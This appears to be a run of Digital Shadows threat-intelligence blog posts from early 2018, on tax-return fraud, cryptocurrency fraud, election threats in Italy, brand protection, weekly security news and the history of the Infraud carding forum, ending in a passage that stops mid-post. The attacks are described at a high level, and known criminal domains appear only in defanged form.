Pressing For Progress This International Women’s Day Thu, 08 Mar 2018 06:27:19 +0000 “Do you think you’re going to be able to handle working with all these men?”

One of the few questions over the course of my career that momentarily stunned me during the interview process, this happened over 20 years ago when I was interviewing for a more technical role in my current company at that time. I say stunned because the question had never occurred to me and this is in spite of growing up during a time when I knew I could be an astronaut (thank you Sally Ride!), but had resigned myself to the fact that “girls can’t be President”.  It sounds ridiculous now to type it, but these were the facts of my life growing up in the southern part of the US, in a very conservative, church-going family and long before the Internet was a thing.

As I ponder our upcoming International Women’s Day and think about the path my own life has taken, I am truly both in awe of how far we’ve come and simultaneously, how far we have yet to go. It has only been in the last few years that I’ve realized a lot of my behaviors have been influenced by unconscious bias, from my parents, teachers, friends, peers and colleagues so I am encouraged to see the dialogue continuing today through the various movements around the world.  

This year’s IWD theme is “Time is Now: Rural and urban activists transforming women’s lives”. I have long looked up to the many amazing and inspiring activists who tackle these challenges on a daily basis. I also think many others are hesitant to call themselves “activist” for fear of reprisal or challenge and I throw my own hat into that ring – I’ve never thought of myself as an activist, despite leading my university’s chapter of N.O.W., marching in “Take back the night” rallies and turning down opportunities for IT employment that had “females must wear dresses” requirements (yes, this really happened). What I’ve learned over the years is that it is less important about what you call yourself – just as our actions shape our destiny, so too do they describe our aspirations and capabilities. For all my male and female friends and colleagues who are nervous about taking up the title activist or feminist, I challenge you to simply “do”. Call out the derogatory jokes when you hear them, challenge your peers to leave discrimination behind them, and turn an eye to your own unconscious bias.

Lastly, in light of the recent RSA keynote conversation and ongoing challenges around having enough women in the cyber security industry, if I could turn the clock back and tell my younger self anything, it would be to build the technical capability, competency and confidence that goes along with that, but also to be open to taking leaps of faith. It took me a long time to realize I could apply for the next challenge or next role without being 110% qualified.

As for that interview question?  My response: “I hope they can handle working with me!” I’m happy to report I got the job.


Interested in reading more on Women in Security? Read my colleague’s blog post, Women in Security: Where We Are And Where We Need To Go.

It’s Accrual World: Tax Return Fraud in 2018 Wed, 07 Mar 2018 17:15:17 +0000 With just over a month until Tax Deadline Day, individuals are scrambling to get their tax returns submitted. This is a proven time of the year for cybercrime, and 2018 has been no exception. The Internal Revenue Service has already outlined new scams targeting consumers this year. Criminals have once again used tax themes as lures to spread malware, as was the case with the Rapid Ransomware campaign.

Tax Fraud in 2018

Tax fraud endures despite countermeasures and increased awareness of the threat. This is largely due to the extent of personally identifiable information (PII) available online. Social Security Numbers (SSNs) are widely advertised and can be purchased for as little as $1; Figure 1 shows a criminal site selling 4,210,341 SSNs, which also include associated names, physical addresses and dates of birth.

Figure 1: Social Security Numbers for sale on cvv[.]me


The Equifax breach in 2017 led to the theft of PII belonging to at least 145 million individuals. Recent revelations suggest that that attackers may have also stolen tax identification numbers, additional driver’s license and credit card details. While it is not clear whether the breach had been conducted by cybercriminals or a nation-state, this data – should it eventually find its way into the criminal market – would provide a wealth of opportunities for tax fraudsters.

Acquiring Tax Information

Tax information – such as W2, 1040 and 1099 forms, as well as company accounts – is valuable data for cybercriminals. This information can be obtained through network intrusions, phishing, and Business Email Compromise. The latter technique typically works by impersonating an employee within the organization. In this tax version of the scam, the victim is asked to transfer tax documents instead of wiring funds. With this data, criminals can then commit fraud or resell the data.

Attackers can also acquire this information through scampages. Tax filing companies are particular targets of these phishing attempts. A recent example of this is turbotax-myintuit[.]com, an imitation of the legitimate turbotax[.]intuit[.]com. While the site is not yet hosting content, it has the potential to be used in phishing campaigns.

At this time of year, fraudsters take to forums requesting help with getting tax information for their scams; meanwhile, more technically capable actors look to profit by providing their services and expertise. In Figure 2, a criminal forum user asks for help in obtaining the relevant documents needed to submit their fraudulent tax return, while in Figure 3 a seller openly advertises their “Hacking Services”, which includes the ability to procure W2 forms.

Figure 2: User on Hack Forums looking to buy W2 and 1040 tax forms (screenshot taken on February 27, 2018)


Figure 3: Seller on Offensive Community forum advertising hacking services


Purchasing Information Online

For a little as $40-50, criminals can bypass these procedures altogether and buy these documents on criminal forums and marketplaces. These include stolen, pre-filled and forged forms (Figure 4), as well as specialist guides for conducting tax return fraud (Figure 5).

Figure 4: Forged W2 form advertised for $52 on Dream Market


Figure 5: Tax return fraud cashout guide for sale on Wall Street marketplace


Social Security Numbers are ubiquitous across dark and deep web marketplaces and criminal shops. In some instances, as seen in Figures 6 and 7, vendors will offer packages that have a range of data on individuals. This can be partial PII or “fullz”, a term that means a combination of financial and personal information. The latter is more valuable for threat actors, but partial of PII can also be used to commit a range of identity frauds, including falsified tax returns.

Figure 6: W2 and SSN information for sale on Wall Street, a darkweb marketplace


Figure 7: “Full profiles” advertised on Dream Market, a dark web marketplace. The posting includes W2 forms, pay-stubs and Social Security Numbers


Of course, there are security measures that make tax fraud more difficult for criminals, such as the IP PIN that is issued to many taxpayers by the IRS. Despite the IRS being vulnerable to compromise in previous years, the system is now more resilient to exposing that information to fraudsters (there is no longer a web interface for forgotten PINs with easy-to-answer questions, for example).

Capitalizing on Dediks

Fraudsters can target the accounts of tax filing companies without the need for phishing or scam pages. In Figure 8, one forum user seeks partners that have control of computers with these pieces of software installed. The term “Dedik” is an abbreviation of “dedicated”, which is used to describe a computer under remote control of a hacker. With control of users’ computers that have this software, malicious actor can capture keystrokes and ultimately gain access to the user accounts.

Figure 8: Actor on a Russian-speaking forum seeking individuals with access to computers that have tax preparation software present (screenshot taken on February 27, 2018)


Staying Safe Online

With actors looking to monetize the vast amount of PII available online during tax season, consumers, organizations and tax filing companies should be extra-vigilant about fraudulent activity. Here are some tips:

  1. Consumers should submit an Identity Theft Affidavit if you have been the victim of identity theft.
  2. IRS provides some great resources for understanding the latest techniques used by attackers, which you can access here, or by following @irstaxpros on Twitter.
  3. Organizations should consider that BEC can be for information as well as to wire funds. Update your security awareness training content to include the BEC scenario. This should be included in new hire training, but you should conduct ad hoc training for this scenario now.
  4. Tax filing companies should monitor for spoofed domains. DNS Twist is a good, free resource to do so.

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.05.2018 Mon, 05 Mar 2018 16:23:17 +0000 On this week’s Shadow Talk podcast, the Research Team cover CVE-2018-4878 being used in a spam campaign, the HTTPS certificate chaos between Trustico and DigiCert, more ransomware reporting on the SamSam and DataKeeper variants, and the threat of large-scale distributed denial of service (DDoS) attacks using Memcached servers.

Spam enables Flash vulnerability exploit

An Adobe Flash vulnerability tracked as CVE-2018-4878 is being exploited through a spam email campaign. Lure emails contained a shortened link that, if clicked, accessed a Web domain hosting weaponized Microsoft Word documents. If documents were opened, the attack attempted to exploit the vulnerability, enabling remote code execution. CVE-2018-4878 was previously exploited as a zero-day vulnerability in targeted espionage; the spam campaign shows its rapid uptake by other threat actors. Proof of concept exploit code was released publicly, meaning CVE-2018-4878 will likely continue to be targeted by operations using multiple entry vectors, despite a patch being available.


Thousands of website certificates revoked after private key exposure

23,000 Symantec-issued HTTPS website certificates resold by Trustico will be revoked after associated private keys were exposed via email. This may result in website service interruptions unless owners quickly replace certificates. Affected customers were notified, with both DigiCert – the entity responsible for revoking the certificates – and Trustico offering free replacement certs. Although both DigiCert and Trustico are likely to suffer some reputational damage due to conflicting reporting and their public dispute, this is unlikely to impact trust in the certification system.


Update on SamSam ransomware attack

The Colorado Department of Transportation, in the United States, took 2,000-plus staff computers offline after an attack by ransomware “SamSam”. No crucial systems were reportedly affected, and only computers running Windows operating systems were disrupted. The attack vector is not known, but SamSam usually targets vulnerable software applications or servers. The “Gold Lowell” threat group has previously used SamSam and accrued a significant profit from attacks.


New DataKeeper ransomware variant detected

The “DataKeeper” ransomware-as-a-service (RaaS) variant is distinct for its ability to conduct lateral movement. At the time of publication, there had been no transactions into the Bitcoin address associated with this RaaS, indicating that any attempted extortions using the address were ineffective. However, given its accessibility, profit share and capacity for lateral movement, this ransomware will likely be adopted by a variety of actors.


Memcached servers used for DDoS reflection attacks

There is a new DDoS reflection attack method that uses Memcached internet-facing servers. Memcached is a memory caching system that, by default, “listens” on UDP port 11211. More than 90,000 of these servers were discovered on Internet of Things search engine, Shodan, as of 28 February. The code repository site GitHub was targeted by this method, with the peak attack volume recorded at 1.35 terabits per second. Blocking, filtering or modifying Memcached configuration to only listen on localhost is recommended.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

The New Frontier: Forecasting Cryptocurrency Fraud Thu, 01 Mar 2018 16:34:51 +0000 Not a week goes by without a new case of cryptocurrency fraud making headlines. The most recent example concerned the BitGrail exchange, which suffered an attack that resulted in the loss of 17 million Nano Tokens ($170 million). Although BitGrail responded by announcing new security measures – highlighting the need for better security practices by both companies and individuals handling cryptocurrencies – this incident has also been marred by a disagreement between Nano Token and BitGrail over liability. This has sharpened calls for strict regulation of cryptocurrencies and their methods of exchange.

Regulation could have a significant impact on the cryptocurrency space, but we need to remember that even with long-stablished regulatory and law enforcement measures, traditional currencies are still targeted by fraudsters, so we shouldn’t expect cryptocurrencies will be any different.

What we can be sure of is that cybercriminals will continue to find new ways of making money as long as there are enough suitable targets available and the financial reward justifies their time and effort. To better model the future of cryptocurrency fraud, it helps to outline the main drivers and assumptions behind this phenomenon, which we have achieved by using the Cone of Plausibility analytical technique (see Figure 1 below). Our recent paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud, provides an analysis of these drivers. These include:

    1. Accessibility – Advances in technology and the wide availability of tools facilitate this type of fraud. Products such as Crypto Jacker lower the barrier to entry, as explored in our previous blog.


    1. Anonymity – Cryptocurrencies and blockchain technology offer a level of anonymity that, while beneficial in many respects, also embolden fraudsters. Currencies like Monero have better privacy features relative to their older cryptocurrency counterparts, which has in part made it increasingly popular on criminal markets and in money laundering operations. The funds accrued during the June 2017 WannaCry attack, for example, were converted from Bitcoin to Monero, likely because this move would make it easier to anonymously convert into fiat currency.


    1. Popularity and hype – The boom in cryptocurrency investment and development in recent years is one of the strongest drivers for this type of fraud. Criminals will always follow the money, looking to take advantage of whatever is most popular and most lucrative. In the mid-nineteenth century, the promise of gold inspired hundreds of thousands of people to make the journey to California in the hope of striking it rich. The cryptocurrency boom can be seen as a new Gold Rush, with countless individuals rushing to get a piece of the action, heartened by the astronomical rise of Bitcoin, which reached $19,343 in mid-December 2017.


    1. Reputation – Once seen as an esoteric countercultural development favoured by libertarians or criminals, the integration of cryptocurrencies into existing payment systems has given them greater legitimacy. Although not widespread, the roll-out of cryptocurrency-backed prepaid cards and plans for private European banks to provide cryptocurrency services increases the reputation of cryptocurrencies – in turn making them a more attractive prospect to investors. If their reputation increases, they will become more popular, increasing the number of targets for fraudsters.


    1. Opportunity – The sheer number of new altcoins, exchanges and coin offerings means that fraudsters have a wealth of potential targets. With over 1,442 cryptocurrencies in circulation, and new alternative coins – “altcoins” – emerging every week, the opportunities for cybercriminals to defraud cryptocurrency enthusiasts only increases. Our previous blog focused on the ways criminals were exploiting the interest in Initial Coin Offerings (ICOs) – a way of crowdfunding cryptocurrencies and platforms – through exit scams, spoof ICOs and price manipulation.


    1. Regulation – The success of price manipulation and scam ICOs is aided by a lack of regulation and oversight. In a regulated market such fraud would be illegal, and the threat of law enforcement action would probably deter many, although not all, criminals. Moreover, exchanges and ICO projects would be under more pressure to improve their security practices as they would face serious consequences for facilitating a breach. The BitGrail case, discussed above, is a clear example where a lack of clarity over who bears responsibility for the attack has meant customers have been so far prevented from reclaiming the value of their tokens.

    Despite more concerted efforts of late by U.S. authorities– the Security and Exchange Commission recently filed charges against PlexCorps, which was accused of defrauding investors through a scam ICO – the future of cryptocurrency regulation is also uncertain and should be seen as a panacea for fraud. Criminals will continue to take risks regardless of the potential legal ramifications of being caught. In addition, regulatory implementation will likely be uneven, with some countries such as China and South Korea choosing to ban ICOs completely. While stricter regulation could have a beneficial effect in reducing fraud, it may also deter would-be investors and drive down the value of cryptocurrencies.


    1. Security – As long as organizations and individuals fail to improve their security measures, opportunities for fraud will continue to exist. Weak password practices enable account takeovers, misconfiguring cloud services facilitates cryptojacking, and failure to patch and update effectively means attackers can continue to exploit known vulnerabilities to deliver cryptomining malware.



    Figure 1: Cone of Plausibility used to forecast future of cryptocurrencies

     One of the greatest benefits of this forecasting approach is that it allows us to clearly outline the drivers behind the rise in cryptocurrency fraud, which in turn then allows us to home in on the factors that we as organizations and individuals can influence. While some changes will be harder and time-consuming to implement, there are several measures that organizations, consumers and exchanges can immediately take to mitigate cryptocurrency fraud risks. These include:


    • Authenticating cloud services like AWS to stop fraudsters from stealing your processing power to mine
    • Replacing factory-default credentials with unique and strong passwords to prevent Internet of Things devices from being incorporated into botnets
    • Enforcing strong password security rules across your organizations – this includes enabling multi-factor authentication (MFA)
    • Patching known vulnerabilities being used to deliver crypto miners. Vulnerabilities in Apache Struts (CVE-2017-5638) and DotNetNuke (CVE-2017-9822) servers have been used to download Monero miners. These miners have also been delivered by exploiting patched vulnerabilities in the popular Apache CouchDB open source database (CVE-2017-12635 and CVE-2017-12636)
    • Having a reputable adblocker in place: the NoCoin browser extension was also developed to block coin miners like Coinhive
    • Checking phishing databases and more specialist cryptocurrency fraud sites such as the Ethereum Scam Database before using any sites that you are unfamiliar with


    Despite their volatility, high valuations, looming regulation measures and the projected adoption of cryptocurrency in both online and physical transactions, cryptocurrency fraud will not go away any time soon. However, greater education about cryptocurrencies and the risks associated with them for consumers and organizations can go a long way to fighting this trend. Digital Shadows will continue to watch this evolving space, providing research and advice that can help users navigate the Wild West that is the cryptocurrency world.

    To learn about other tactics, including account takeover and crypto jacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

    Protecting Your Brand: Return on Investment Tue, 27 Feb 2018 16:29:23 +0000 Last week I was joined by Brett Millar, Director of Global Brand Protection for Fitbit, for a webinar on “Protecting Brands from Digital Risks and the Dark Web”. It was great to hear how Brett works with different business functions to address different risks to the Fitbit brand. Most of all, I loved hearing about the different ways in which Brand Managers can demonstrate a return on investment (ROI).


    Brand Protection

    For organizations looking to safeguard their brands online, there are lots of online sources where this occurs. Within the webinar I spoke about the threats to brands that exist on the dark web -specifically on account takeover and counterfeit goods. Dark web marketplaces, such as Dream Market shown below, have whole sections dedicated the sale of counterfeit goods. Of course, there is a lot more to brand protection than dark web activity. Organizations need to be monitoring a wide range of sources to adequately protect their brands online. (Check out a blog from our CMO, Dan Lowden, on some specific instances of brand exposure that we’ve seen involving spoof domains, fake mobile applications, and fake social media profiles.)


    Figure 1: A dedicated counterfeit category on the Dream Market, with over 2,800 goods for sale


    Affecting the Bottom Line

    ROI (Return on Investment) is common term in security, but effectively demonstrating it is difficult. One reason for this is that ROI is a calculation usually expressed numerically or as a percentage. The impact of your security investment, however, does not always lend itself to quantifiable metrics. It is always trickier trying to show how events that have not happened, like cyber attacks that have been averted, impact a company’s net earnings or bottom line.

    The concept of ROI is just as critical for brand protection; Brand Managers need to be able to show they are impacting the bottom line. The good news is that the result of your brand protection strategy is measurable, and there are three main ways to do just that.

    1. Direct revenue return. This is the most clear-cut way of demonstrating ROI. Investigations launched by an organization’s fraud team in counterfeit sites can lead to proceeds flowing back into the company. This typically occurs through settlements, judgement amounts, and restitution amounts. This approach is pretty easy to quantify.
    2. Loss prevention. This is a different side of the same coin as direct revenue return. Stopping an activity that was costing the company $X million per year prevents this loss from reoccurring.
    3. Indirect revenue. If an increase in revenue for a particular product coincides with an increased effort to remove counterfeits of that product on gray and black markets, it can be inferred that there may have been some sort of causation. This is harder to quantify but it can, nonetheless, be valuable.

    These metrics can be supplemented with other metrics, such as tracking the number of:

    • Cease and Desist letters sent
    • Audits performed
    • Sites taken down
    • Custom site seizures

    With so many areas of security to focus on, demonstrating a return on investment is a constant challenge. However, the intersection of brand management and security offers a real opportunity to demonstrate the economic value of protecting your brand online.

    Watch the webinar on “Protecting Brands from Digital Risks and the Dark Web” to find out more about other types of brand exposure and ways organizations can manage this risk.

    Shadow Talk Update – 02.26.2018 Mon, 26 Feb 2018 15:51:21 +0000 In this week’s podcast, the Digital Shadows Research Team discuss attacks against banks using the SWIFT network, business email compromise (BEC) threats, the state of ransomware, as well as new activity by thedarkoverlord and APT-37.



    Two new thefts using SWIFT network confirmed

    Over the past week, an unidentified Russian bank and India’s City Union Bank confirmed that recent fraudulent SWIFT banking transfer requests had been submitted, attempting to steal $8 million. Specifics of malware deployment, and the perpetrators’ tactics, techniques and procedures (TTPs), are among the many unknown details. Previous SWIFT attacks have been attributed to “Lazarus Group”, although several financially motivated actors have likely made similar theft attempts. Targeting this transfer system remains profitable, and further theft attempts are likely.


    Business email compromise campaign targets Fortune 500 companies

    Fortune 500 companies—ranked among the highest-revenue companies in the United States – have been subject to an ongoing BEC campaign. Targets operated in the retail, healthcare, financial and professional services sectors. Campaign operators have allegedly stolen “millions of dollars” using spearphishing, as well as advanced social engineering techniques; no malware was involved.


    Extortion actor thedarkoverlord publicizes new targets

    The threat actor thedarkoverlord has returned after a three-month hiatus. Recent Twitter activity suggests targeting of a US public school union, a US law firm, and un-specified Hollywood companies. Thedarkoverlord has previously conducted a number of extortion campaigns, largely against the United States healthcare sector. Digital Shadows cannot establish the veracity of these new claims, but it is likely that thedarkoverlord is attempting to gain new publicity by threatening high-profile targets.


    Ransomware remains a threat to organizations in all industries

    The “Saturn” ransomware-as-a-service (RaaS) variant has been active in February. Saturn RaaS does not require a sign-up fee, instead, developers request 30% of extortion fees generated from each successful infection. In other ransomware news, the Colorado Department of Transportation (CDOT) was affected by a SamSam ransomware infection on 21 February 2018. This infection reportedly caused disruption to 2,000 computers owned by CDOT; however, CDOT stated it will not pay the ransom and is using system backups.


    North Korea-linked espionage group APT-37 continues to evolve

    Cyber security company FireEye reported the continued activity and evolution of “APT-37” (aka Reaper), an allegedly North Korea-linked threat group motivated by information theft and espionage. FireEye’s research also linked APT-37 activity to that reported for other threat actors, including “Group 123” and “ScarCruft”, although exact details were unclear. APT-37 has mainly targeted the technology and healthcare sectors in South Korea, but has also implicated Japan, Vietnam and the Middle East. APT-37 will likely continue their information-gathering campaigns for the short- to mid-term future (one to six months) and more information about the group may arise during that time.

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Threats to the Upcoming Italian Elections Thu, 22 Feb 2018 17:08:26 +0000 On 5 March Italian citizens will vanno alle urne to vote in a general election, following the dissolution of the Italian Parliament by President Sergio Mattarella on 28 December 2017. Italy has been led by a caretaker government under the leadership of Democratic Party (PD) foreign minister Paolo Gentiloni since the resignation of former Prime Minister Matteo Renzi. Renzi stepped down following the loss of a referendum on constitutional reforms in December 2016.

    This March will see the use of a new electoral system, one designed to favor coalitions by requiring the governing party to gain over 40% of the vote, thus making it harder for a single party to win a majority in Italy’s notoriously divided parliament. No party has yet polled above 40%, with a centre-right alliance formed by Silvio Berlusconi currently polling at approximately 35%.

    Under the growing cloud cast by reports of network intrusions against political parties during the 2016 United States presidential election, as well as claims of a Kremlin-backed influence campaign in favour of the Front National in the French elections, political events are coming under more and more scrutiny for nefarious activity. In this blog we will assess the confirmed examples of cyber attacks that we have observed, and look back at activity seen during previous elections to forecast the type of activity we can expect. This includes hacktivism, network intrusions, data leaks and disinformation.


    1. Hacktivism

    Hacktivist actors are most often motivated by public attention, either for themselves, or the issues they claim to represent. Hacktivist attacks generally take the form of denial of service (DoS) attempts, website defacements, and the curation of open source data to appear like a data leak. The Anonymous collective has had an ongoing #OpItaly campaign since January 2017, when Italian law enforcement arrested two individuals charged with cyber espionage against politicians, public institutions, and commercial entities. The activities of the group have not yet targeted political parties, but may use the publicity surrounding the elections as a platform to gain public attention.

    Further factions of the collective, such as the Italian hacktivist group AnonPlus, have specifically targeted the elections, releasing personally identifiable information of regional PD members and defacing PD websites. However, their impact so far has been limited, and is unlikely to have any lasting impact on the elections themselves: the ‘leaked’ was already available on open sources, and their websites defacements did not cause any persistent disruption.

    More sophisticated threat actors have targeted the Rousseau platform used by far-right party Movimento5Stelle (M5S). #Hack5Stelle is a campaign focused on leaking names, passwords, and datasets associated to the platform, and motivated by both financial and political motives.


    Figure 1: Twitter account offering allegedly hacked Movimento5Stelle database for sale


    Figure 2: Landing page for the Rousseau platform


    2. Network Intrusions

    Actors may seek to target political parties or government organizations in order to exfiltrate sensitive data for use in political campaigns. Given alleged Russian involvement in the network intrusions against the Democratic party in the US, and the signing of a collaboration agreement between far-right party Lega Nord and Vladimir Putin’s United Russia party, it is plausible that a similar threat may be present during the Italian elections. Fraught current relations between Russia, NATO, and the EU, combined with the Lega Nord’s anti-EU platform means that the Italian elections are likely to present a target for Russian espionage campaigns. Furthermore, large financial institutions may be targeted given the focus on the economy and currency in this year’s election.

    Social engineering and spear phishing remain the most successful attack vectors for network intrusions, and this is unlikely to change for the Italian elections.


    3. Data leaks

    While a number of activist groups have leaked open source databases of local political parties, a more sophisticated threat actor could release sensitive or confidential information in order to bias political opinion. Such information can be obtained in a number of ways and be used by a variety of threat actors, including both ideologically motivated individuals and nation state groups. Phishing and social engineering attempts, network intrusions, and document theft from insiders are all ways in which threat actors may seek to obtain such data. We detected no data leak campaigns relating to the Italian elections at the time of writing.


    4. Disinformation

    False media reporting, also known as the fake news phenomenon, is being increasingly used by threat actors to sway or alter public political opinion. Such activity uses a wide variety of platforms, including legitimate or spoof social media accounts such as Facebook and Twitter, and interweaves both legitimate and exaggerated or false reporting. During the French elections, we observed a claim of plagiarism, as a spoofed websites of legitimate Belgian newspaper LeSoir published articles alleging that Saudi Arabia was financing Emmanuel Macron’s campaign. We outlined the easy availability of such tools in our previous report, The Business of Disinformation.

    Although no legitimate newspapers have claimed plagiarism during the Italian elections, a number of Twitter accounts related to Wikileaks Italy (@Wikileaks_Ita – to which the main Wikileaks account has denied any official association), have been tweeting news relating to the current Eni bribery investigations. The account uses a combination of real news reports and rumours to allege former Prime Minister Renzi’s involvement with criminal activities. Although Renzi is not standing in this election, such an allegation has a reputational impact for the PD, Renzi’s party.


    Figure 3: Twitter account impersonating WikiLeaks used to spread articles on corruption investigations


    Furthermore, fake accounts on Twitter and Facebook used in the referendum campaign in 2016 have been reanimated in support of Matteo Salvini, leader of the Lega Nord. A number of automated accounts have been linked to the party’s official Twitter feed, @LegaSalvini. Although these bots have not been used to publicize fake news, they have been used to bias or promote political opinions by artificially inflating the support and publicity accorded to Salvini.



    Figure 4: Examples of Twitter bots all used to publish the same posts in support of Matteo Salvini


    E allora?

    Despite ongoing concern surrounding elections, it is unlikely that outside threat actors will seek to interfere in an already chaotic process. Unlike elections in France and Germany in 2017, the Italian electoral process is much more obscure, and the proliferation of smaller parties makes it difficult to definitively outline where an influence campaign could add value. Similarly, it is difficult to understand which party any external threat actor would seek to influence, as none are likely to gain a clear lead, and all have made varying conflicting and public statements about the parties with whom they would be willing to cooperate.

    The most likely threat comes from internal hacktivist campaigns: in addition to defacement attacks, groups may seek to conduct DDoS attacks against election infrastructure or to deface official websites, hindering the voting process.

    While the scenarios above remain unclear, organizations can help protect themselves against many of the techniques and threats described above. Mitigation measures include:

    • Providing adequate training for staff regarding the threat from spear phishing and social engineering attacks. This will mitigate against the most likely, but not the only, attack vectors for network intrusion and public data leaks.
    • Properly securing public facing applications and tracking activist campaigns.
    • Enforcing strong password security practices to reduce the likelihood of account takeovers.
    • Remaining skeptical about reported statistics and stories.

    Subscribe to our weekly newsletter to get the threat intelligence and research by Digital Shadows.

    Prioritize to Avoid Security Nihilism Tue, 20 Feb 2018 15:41:56 +0000 In many situations associated with cyber security, in particular defending an organization, it is easy to get overwhelmed with not only the sheer number of issues but also the complexity of the interconnections between them. Technical issues are inextricably linked with social, cultural and political issues. Confronted with this sea of obstacles, it’s easy to succumb to security nihilism: “nothing is ever good enough”, “offense always wins” or “security is a losing battle”. As a defender, it is crushing to see how even an average Red Team can rip apart your defences, another successful engagement for Team Red as your passwords tumble helplessly out of the Domain Controller!

    It’s a truism, if not a platitude, that “perfect is the enemy of good”, but I believe that this phrase takes on a new meaning in the world of cyber security. The answer to security nihilism is the art and science of prioritization. Since defenders cannot protect everything to an equal standard, trade-offs have to be made. Difficult decisions must be taken. But where to start? I would argue that the best place to start is with the reality of protecting your organization. By which I mean, a pragmatic focus on:

    1. The critical assets that your organization has
    2. The credible threats to those assets

    Threat modelling exercises are useful heuristics for roughly figuring out the critical assets and the credible threats. An organization that handles payment card data will have a different set of assets and threats compared to another organization that handles sensitive government data to another organization that may regularly store Protected Health Information (PHI). An organization’s security posture should be appropriate for the types of threats that they realistically face.

    In order for these threat modeling exercises, which are often table-top exercises, to have meaning, they must be grounded in reality. Not all threats that organizations face wield NSA-grade 0days. Not all organizations are routinely attacked by APT groups. But understanding how attackers you are facing actually operate is essential. As The Grugq is fond of saying, “increase attacker costs!”. As defenders, we need to understand what tasks are costly for attackers and how to make those tasks even more expensive.

    Let’s see how standard TTPs (tactics, techniques, and procedures) used by a wide-variety of different threat actors can be made more expensive. We’ll start with a phishing campaign:



    Outside in, network-based attacks are also widely-used:



    Most organizations have key employees who are high-value targets for attackers and most organizations have externally facing systems, in particular Web applications. These assets are a good place to start. By understanding how attackers operate, we can establish some priorities about which actions as defenders we should take based upon the assets that we have and our knowledge of how attackers operate. As our capability matures, our assets can become more specific and nuanced and our understanding of attacker tradecraft similarly develops. Robust fundamentals, however, never go out of style!


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 02.19.2018 Mon, 19 Feb 2018 21:42:21 +0000 In this week’s Shadow Talk podcast, the Digital Shadows Research Team analyses new activity from the Lazarus Group, attacks on the Winter Games opening ceremony, the theft of $170 million from the Bitgrail cryptocurrency exchange, and two Outlook vulnerabilities.


    Lazarus Group continues to pursue theft and espionage 

    New Lazarus Group activity reported this week shows that the threat group remains highly active and motivated by financial and information theft, as well as espionage. The group was attributed with the financially motivated HaoBao campaign, targeting Bitcoin users, and the development of two trojan variants, “HardRain” and “BadCall”. The targeting of cryptocurrency marks a relatively recent evolution in Lazarus Group’s tactics, techniques and procedures (TTPs). The trojan malware indicates the group’s sustained interest in espionage tools. Digital Shadows expects the group to continue to target cryptocurrency trading platforms within the next one to six months.


    Winter Olympics ‘targeted with Olympic Destroyer’ malware 

    Cyber security researchers have identified a sample of what they assess to be the malware used during the opening ceremony of the 2018 Olympic Winter Games. The malware attacks suspended Wi-Fi in the stadium and press center. Despite having limited effects, the malware appears technically complex with varied techniques, including hardcoded credentials within its source code to allow lateral system movement. Competing and conflicting reports have linked the campaign to North Korea, China and/or Russia, but there has been insufficient evidence to definitively implicate any threat actor.


    BitGrail reports USD 170 million cryptocurrency loss

    The BitGrail cryptocurrency exchange suffered an attack in which 17 million Nano Tokens (USD 170 million) were allegedly lost. Prior to the disclosure of the attack, BitGrail suspended all withdrawals and deposits of several cryptocurrencies and announced new security measures. Subsequently, a series of heated disagreements have sprung up between the creators of Nano Token and the BitGrail exchange, with neither accepting responsibility for the loss, and both accusing the other of suspicious behavior. Such disagreements will likely prevent customers from reclaiming the value of their tokens. The fallout from the attack will likely strengthen the call to regulate cryptocurrencies and their methods of exchange.


    RCE vulnerability affects MS Outlook

    Microsoft (MS) has released descriptions of two vulnerabilities affecting its Outlook software. One is CVE-2018-0852, a memory corruption vulnerability allowing arbitrary remote code execution (RCE) if users access a crafted malicious file. The second is CVE-2018-0850, a privilege escalation vulnerability. Although neither has been detected as being exploited in the wild, both affect multiple version of MS Outlook; given their ubiquity, it is likely that criminals will seek to exploit them.

    Listen to the full podcast here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Infraud Forum Indictment and Arrests: What it Means Thu, 15 Feb 2018 17:44:48 +0000 On 07 February 2018, the U.S. Department of Justice unveiled an indictment from 31 October 2017 against 36 individuals associated with the Infraud Forum, a cybercriminal forum specializing in payment card fraud. This was a result of an operation known as “Shadow Web” and claimed to make “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.” The members of the forum are alleged to have caused over $500million in actual losses.

    In the context of last year’s seizure of AlphaBay and Hansa dark web marketplaces, what does this mean for the evolution of the criminal ecosystem, and what is the potential impact on organizations?

    Figure 1: A screenshot of infraud[.]wf, one of the latest editions of the Infraud Forum. Screenshot taken on 7 February 2018.


    Humble beginnings

    The Infraud forum has been through many incarnations, and there are several domains still carrying the Infraud name. The term “infraud”, however, first appeared on a WordPress blog known as the “infraud underground carders blog”. The earliest post on this site is dated 31 October 2010. These initial posts mainly provided advice on carding and ATM fraud, as well as reposts of news articles on criminal and fraudulent activity.

    The first reference on this blog to a dedicated Infraud site appeared on 11 November 2010, when a post was added offering downloads for a ZeuS crimeware toolkit. The post contained a url link to a thread on infraud[.]ws.

    On 24 November 2010, a new post was added to the site claiming that the name of the group behind the blog had changed to “Ministry of Fraudulently Affairs”.


    Figure 2: Screenshot of Infraud underground carders blog


    A post added on 07 December 2010 claimed that the infraud[.]ws domain had been blocked as it was reported to host malware and fraudulent content. The next day, the Infraud domain had changed to from infraud[.]ws to infraud[.]su.

    As of 03 March 2011, the blog advised users to only visit hxxps://infraud[.]cc.


    Figure 3: Post made on Infraud blog advising users to visit infraud[.]cc, a domain registered on 30 November 2010


    The name Ministry of Fraudulently Affairs also appears on a separate LiveJournal blog site (hxxp://infraud.livejournal[.]com) where advertisements and links to the infraud[.]cc site were posted.

    The “Infraud Journal” user profile for this blog site contained a link to the infraud[.]cc website, and a Twitter account ( that is now suspended. The user stated their location was Borispol, Ukraine and used the Buddhist symbol Om as a logo. The account was created on 30 October 2010 and was last updated on 05 August 2014.


    Figure 4: infraud profile on Infraud Journal blog


    Online profiles using the “infraud” naming started appearing frequently across several criminal forums in December 2010 and January 2011. Many of these profiles used details and indicators previously used on the WordPress and Infraud Journal blogs, including the names “infraud” or “Ministry of Fraudulently Affairs”, and the Om Buddhist symbol as a profile picture. In this example from 26 January 2011 (below), the user infraud advertised an IP address and domains associated with the Infraud operation.


    Figure 5: Post made to hpc[.]name forum by user “infraud” containing links to various infraud domains


    How it worked

